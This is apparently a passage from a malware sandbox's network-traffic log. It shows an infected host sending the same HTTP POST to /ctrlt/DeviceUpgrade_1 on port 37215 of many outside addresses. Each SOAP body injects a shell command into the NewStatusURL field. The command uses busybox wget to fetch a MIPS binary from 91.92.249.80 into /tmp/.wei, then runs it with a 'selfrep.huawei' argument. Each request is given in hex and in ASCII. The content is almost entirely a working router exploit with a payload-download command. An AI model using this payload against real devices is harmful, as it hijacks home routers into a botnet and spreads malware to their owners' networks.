                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1224192.168.2.2337802155.35.98.4637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326077938 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1225192.168.2.2348448157.46.254.337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326097965 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1226192.168.2.234878069.197.111.8237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326122046 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1227192.168.2.2337768157.68.85.2637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326136112 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1228192.168.2.233759641.42.127.8437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326339006 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1229192.168.2.2337264197.127.13.10337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326351881 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1230192.168.2.233894841.187.244.3837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326373100 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1231192.168.2.2336874157.93.128.8337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326375008 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1232192.168.2.233967241.16.16.22137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326551914 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1233192.168.2.2358354197.203.184.18937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.326553106 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
